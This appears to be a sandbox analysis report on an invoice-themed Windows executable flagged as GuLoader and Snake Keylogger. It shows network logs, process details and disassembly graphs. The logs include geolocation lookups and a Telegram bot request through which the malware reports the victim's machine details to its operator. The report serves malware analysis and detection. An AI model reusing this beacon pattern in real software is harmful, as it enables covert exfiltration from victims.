                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=If3ux9pifP%2BLTsJnKVDN7wjDq%2BBydgHO%2BE5M7qdz3MVjgv%2Bmix%2BiwewnQEadpyCKNIM0JclRz5RLjZNcpY081a1Su35EX3R7Z0tuuhOkoDt2eIO6i1NTEVUSchRLvuaRFMLJBD3p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481708bc7545ff-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2732075&cwnd=251&unsent_bytes=0&cid=7ac8d3582355bc39&ts=150&x=0"
                                                                                                                                2024-11-18 12:51:05 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.849723188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:07 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:07 UTC848INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:07 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35750
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ouz64boghTa944r8eit6tT48iW4qwjbCSBYWdDS0IRvuPyNPDDo7Rym6EDaJjUWiHejxvag0ALWSaHr%2BRvWMkmITu9oCdi1PEaP5ATLRiM%2BynREbqyqLbecs2ySNyQvBbmPjUHBm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481712db4545f3-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1597352&cwnd=249&unsent_bytes=0&cid=d0909560d1d3e40d&ts=150&x=0"
                                                                                                                                2024-11-18 12:51:07 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.849725188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:09 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:10 UTC850INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:09 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35752
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JB9aeWv6BbhvQQlVq5HAIpUA1vqoVrJgpOfGSfscsLsrx2202az1JE3iArp9rpKI6W7bW7kT8My9Kh5lBdH8dQrTS1G1SjfM3BR%2Fq9noM8i6u4fvnzctdIPgfVA3u6%2FtQ%2BMnISev"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4817231efb6c69-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1188&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=54a4a3c12a15f1ab&ts=146&x=0"
                                                                                                                                2024-11-18 12:51:10 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.849727188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:11 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:11 UTC858INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:11 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35754
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kd4VLP%2Bqhfys8BlLqa4XQMifeGXMaB2ABL%2FSi2PJLUirePbuTNMACDExae%2BsQPw%2F5O2X%2BJ4sx4hJIiSZJPrJv0XLTD7atP6sd7dcL%2FUldWlMGmohKPijlt%2FFdPRjerw1tow1MizR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e48172d2dda2e5a-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=d14ab14c703f5422&ts=151&x=0"
                                                                                                                                2024-11-18 12:51:11 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.849729188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:13 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                2024-11-18 12:51:13 UTC852INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:13 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35756
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQL%2F346jgBdcuPvOQtTy5M7T4LOBc7DtQ7jlXVKjpf%2FLUmcq7JPpwHcXytz9Tx9xr2bla74hZaSY3j8G%2B%2BGs8lQG93Ey3iHq0PqxE5nTwQYdK5IfgnGAvptypQky6tCSVc0rzfrc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e481738ab7247ab-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2642335&cwnd=251&unsent_bytes=0&cid=44b415538649552e&ts=160&x=0"
                                                                                                                                2024-11-18 12:51:13 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.849730149.154.167.2204437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:14 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                Host: api.telegram.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:14 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:14 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 55
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-11-18 12:51:14 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:07:49:32
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:701'493 bytes
                                                                                                                                MD5 hash:2494D7B2FD14DC5604FD6AA412F170FC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:07:50:18
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:701'493 bytes
                                                                                                                                MD5 hash:2494D7B2FD14DC5604FD6AA412F170FC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:17.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:19.6%
                                                                                                                                  Total number of Nodes:1572
                                                                                                                                  Total number of Limit Nodes:35
                                                                                                                                  execution_graph 4148 401941 4149 401943 4148->4149 4154 402c41 4149->4154 4155 402c4d 4154->4155 4199 4062a6 4155->4199 4158 401948 4160 405996 4158->4160 4241 405c61 4160->4241 4163 4059d5 4169 405af5 4163->4169 4255 406284 lstrcpynW 4163->4255 4164 4059be DeleteFileW 4170 401951 4164->4170 4166 4059fb 4167 405a01 lstrcatW 4166->4167 4168 405a0e 4166->4168 4171 405a14 4167->4171 4256 405ba5 lstrlenW 4168->4256 4169->4170 4284 4065c7 FindFirstFileW 4169->4284 4174 405a24 lstrcatW 4171->4174 4176 405a2f lstrlenW FindFirstFileW 4171->4176 4174->4176 4176->4169 4185 405a51 4176->4185 4177 405b1e 4287 405b59 lstrlenW CharPrevW 4177->4287 4180 405ad8 FindNextFileW 4183 405aee FindClose 4180->4183 4180->4185 4181 40594e 5 API calls 4184 405b30 4181->4184 4183->4169 4186 405b34 4184->4186 4187 405b4a 4184->4187 4185->4180 4194 405a99 4185->4194 4260 406284 lstrcpynW 4185->4260 4186->4170 4190 4052ec 24 API calls 4186->4190 4189 4052ec 24 API calls 4187->4189 4189->4170 4192 405b41 4190->4192 4191 405996 60 API calls 4191->4194 4193 40604a 36 API calls 4192->4193 4196 405b48 4193->4196 4194->4180 4194->4191 4195 4052ec 24 API calls 4194->4195 4261 40594e 4194->4261 4269 4052ec 4194->4269 4280 40604a MoveFileExW 4194->4280 4195->4180 4196->4170 4203 4062b3 4199->4203 4200 4064fe 4201 402c6e 4200->4201 4232 406284 lstrcpynW 4200->4232 4201->4158 4216 406518 4201->4216 4203->4200 4204 4064cc lstrlenW 4203->4204 4207 4062a6 10 API calls 4203->4207 4209 4063e1 GetSystemDirectoryW 4203->4209 4210 4063f4 GetWindowsDirectoryW 4203->4210 4211 406518 5 API calls 4203->4211 4212 406428 SHGetSpecialFolderLocation 4203->4212 4213 4062a6 10 API calls 4203->4213 4214 40646f lstrcatW 4203->4214 4225 406152 4203->4225 4230 4061cb wsprintfW 4203->4230 4231 406284 lstrcpynW 4203->4231 4204->4203 4207->4204 4209->4203 4210->4203 4211->4203 4212->4203 4215 406440 SHGetPathFromIDListW CoTaskMemFree 4212->4215 4213->4203 4214->4203 4215->4203 4222 406525 4216->4222 4217 4065a0 CharPrevW 4218 40659b 4217->4218 4218->4217 4220 4065c1 4218->4220 4219 40658e CharNextW 4219->4218 4219->4222 4220->4158 4222->4218 4222->4219 4223 40657a CharNextW 4222->4223 4224 406589 CharNextW 4222->4224 4237 405b86 4222->4237 4223->4222 4224->4219 4233 4060f1 4225->4233 4228 4061b6 4228->4203 4229 406186 RegQueryValueExW RegCloseKey 4229->4228 4230->4203 4231->4203 4232->4201 4234 406100 4233->4234 4235 406104 4234->4235 4236 406109 RegOpenKeyExW 4234->4236 4235->4228 4235->4229 4236->4235 4238 405b8c 4237->4238 4239 405ba2 4238->4239 4240 405b93 CharNextW 4238->4240 4239->4222 4240->4238 4290 406284 lstrcpynW 4241->4290 4243 405c72 4291 405c04 CharNextW CharNextW 4243->4291 4246 4059b6 4246->4163 4246->4164 4247 406518 5 API calls 4253 405c88 4247->4253 4248 405cb9 lstrlenW 4249 405cc4 4248->4249 4248->4253 4250 405b59 3 API calls 4249->4250 4252 405cc9 GetFileAttributesW 4250->4252 4251 4065c7 2 API calls 4251->4253 4252->4246 4253->4246 4253->4248 4253->4251 4254 405ba5 2 API calls 4253->4254 4254->4248 4255->4166 4257 405bb3 4256->4257 4258 405bc5 4257->4258 4259 405bb9 CharPrevW 4257->4259 4258->4171 4259->4257 4259->4258 4260->4185 4297 405d55 GetFileAttributesW 4261->4297 4264 40597b 4264->4194 4265 405971 DeleteFileW 4267 405977 4265->4267 4266 405969 RemoveDirectoryW 4266->4267 4267->4264 4268 405987 SetFileAttributesW 4267->4268 4268->4264 4270 405307 4269->4270 4279 4053a9 4269->4279 4271 405323 lstrlenW 4270->4271 4272 4062a6 17 API calls 4270->4272 4273 405331 lstrlenW 4271->4273 4274 40534c 4271->4274 4272->4271 4275 405343 lstrcatW 4273->4275 4273->4279 4276 405352 SetWindowTextW 4274->4276 4277 40535f 4274->4277 4275->4274 4276->4277 4278 405365 SendMessageW SendMessageW SendMessageW 4277->4278 4277->4279 4278->4279 4279->4194 4281 40606b 4280->4281 4282 40605e 4280->4282 4281->4194 4300 405ed0 4282->4300 4285 405b1a 4284->4285 4286 4065dd FindClose 4284->4286 4285->4170 4285->4177 4286->4285 4288 405b24 4287->4288 4289 405b75 lstrcatW 4287->4289 4288->4181 4289->4288 4290->4243 4292 405c21 4291->4292 4295 405c33 4291->4295 4294 405c2e CharNextW 4292->4294 4292->4295 4293 405c57 4293->4246 4293->4247 4294->4293 4295->4293 4296 405b86 CharNextW 4295->4296 4296->4295 4298 40595a 4297->4298 4299 405d67 SetFileAttributesW 4297->4299 4298->4264 4298->4265 4298->4266 4299->4298 4301 405f00 4300->4301 4302 405f26 GetShortPathNameW 4300->4302 4327 405d7a GetFileAttributesW CreateFileW 4301->4327 4304 406045 4302->4304 4305 405f3b 4302->4305 4304->4281 4305->4304 4307 405f43 wsprintfA 4305->4307 4306 405f0a CloseHandle GetShortPathNameW 4306->4304 4308 405f1e 4306->4308 4309 4062a6 17 API calls 4307->4309 4308->4302 4308->4304 4310 405f6b 4309->4310 4328 405d7a GetFileAttributesW CreateFileW 4310->4328 4312 405f78 4312->4304 4313 405f87 GetFileSize GlobalAlloc 4312->4313 4314 405fa9 4313->4314 4315 40603e CloseHandle 4313->4315 4329 405dfd ReadFile 4314->4329 4315->4304 4320 405fc8 lstrcpyA 4323 405fea 4320->4323 4321 405fdc 4322 405cdf 4 API calls 4321->4322 4322->4323 4324 406021 SetFilePointer 4323->4324 4336 405e2c WriteFile 4324->4336 4327->4306 4328->4312 4330 405e1b 4329->4330 4330->4315 4331 405cdf lstrlenA 4330->4331 4332 405d20 lstrlenA 4331->4332 4333 405d28 4332->4333 4334 405cf9 lstrcmpiA 4332->4334 4333->4320 4333->4321 4334->4333 4335 405d17 CharNextA 4334->4335 4335->4332 4337 405e4a GlobalFree 4336->4337 4337->4315 4338 4015c1 4339 402c41 17 API calls 4338->4339 4340 4015c8 4339->4340 4341 405c04 4 API calls 4340->4341 4351 4015d1 4341->4351 4342 401631 4344 401663 4342->4344 4345 401636 4342->4345 4343 405b86 CharNextW 4343->4351 4348 401423 24 API calls 4344->4348 4365 401423 4345->4365 4355 40165b 4348->4355 4351->4342 4351->4343 4354 401617 GetFileAttributesW 4351->4354 4357 405855 4351->4357 4360 4057bb CreateDirectoryW 4351->4360 4369 405838 CreateDirectoryW 4351->4369 4353 40164a SetCurrentDirectoryW 4353->4355 4354->4351 4372 40665e GetModuleHandleA 4357->4372 4361 405808 4360->4361 4362 40580c GetLastError 4360->4362 4361->4351 4362->4361 4363 40581b SetFileSecurityW 4362->4363 4363->4361 4364 405831 GetLastError 4363->4364 4364->4361 4366 4052ec 24 API calls 4365->4366 4367 401431 4366->4367 4368 406284 lstrcpynW 4367->4368 4368->4353 4370 405848 4369->4370 4371 40584c GetLastError 4369->4371 4370->4351 4371->4370 4373 406684 GetProcAddress 4372->4373 4374 40667a 4372->4374 4377 40585c 4373->4377 4378 4065ee GetSystemDirectoryW 4374->4378 4376 406680 4376->4373 4376->4377 4377->4351 4379 406610 wsprintfW LoadLibraryExW 4378->4379 4379->4376 5121 404a42 5122 404a52 5121->5122 5123 404a6e 5121->5123 5132 4058ce GetDlgItemTextW 5122->5132 5125 404aa1 5123->5125 5126 404a74 SHGetPathFromIDListW 5123->5126 5128 404a84 5126->5128 5131 404a8b SendMessageW 5126->5131 5127 404a5f SendMessageW 5127->5123 5130 40140b 2 API calls 5128->5130 5130->5131 5131->5125 5132->5127 5133 406dc3 5137 406812 5133->5137 5134 40717d 5135 406893 GlobalFree 5136 40689c GlobalAlloc 5135->5136 5136->5134 5136->5137 5137->5134 5137->5135 5137->5136 5137->5137 5138 406913 GlobalAlloc 5137->5138 5139 40690a GlobalFree 5137->5139 5138->5134 5138->5137 5139->5138 5147 6ff41671 5153 6ff41516 5147->5153 5149 6ff416cf GlobalFree 5150 6ff416a4 5150->5149 5151 6ff41689 5151->5149 5151->5150 5152 6ff416bb VirtualFree 5151->5152 5152->5149 5155 6ff4151c 5153->5155 5154 6ff41522 5154->5151 5155->5154 5156 6ff4152e GlobalFree 5155->5156 5156->5151 4491 401e49 4499 402c1f 4491->4499 4493 401e4f 4494 402c1f 17 API calls 4493->4494 4495 401e5b 4494->4495 4496 401e72 EnableWindow 4495->4496 4497 401e67 ShowWindow 4495->4497 4498 402ac5 4496->4498 4497->4498 4500 4062a6 17 API calls 4499->4500 4501 402c34 4500->4501 4501->4493 5157 40264a 5158 402c1f 17 API calls 5157->5158 5167 402659 5158->5167 5159 402796 5160 4026a3 ReadFile 5160->5159 5160->5167 5161 405dfd ReadFile 5161->5167 5163 4026e3 MultiByteToWideChar 5163->5167 5164 402798 5179 4061cb wsprintfW 5164->5179 5166 402709 SetFilePointer MultiByteToWideChar 5166->5167 5167->5159 5167->5160 5167->5161 5167->5163 5167->5164 5167->5166 5168 4027a9 5167->5168 5170 405e5b SetFilePointer 5167->5170 5168->5159 5169 4027ca SetFilePointer 5168->5169 5169->5159 5171 405e77 5170->5171 5176 405e8f 5170->5176 5172 405dfd ReadFile 5171->5172 5173 405e83 5172->5173 5174 405ec0 SetFilePointer 5173->5174 5175 405e98 SetFilePointer 5173->5175 5173->5176 5174->5176 5175->5174 5177 405ea3 5175->5177 5176->5167 5178 405e2c WriteFile 5177->5178 5178->5176 5179->5159 5190 4016cc 5191 402c41 17 API calls 5190->5191 5192 4016d2 GetFullPathNameW 5191->5192 5193 4016ec 5192->5193 5199 40170e 5192->5199 5196 4065c7 2 API calls 5193->5196 5193->5199 5194 401723 GetShortPathNameW 5195 402ac5 5194->5195 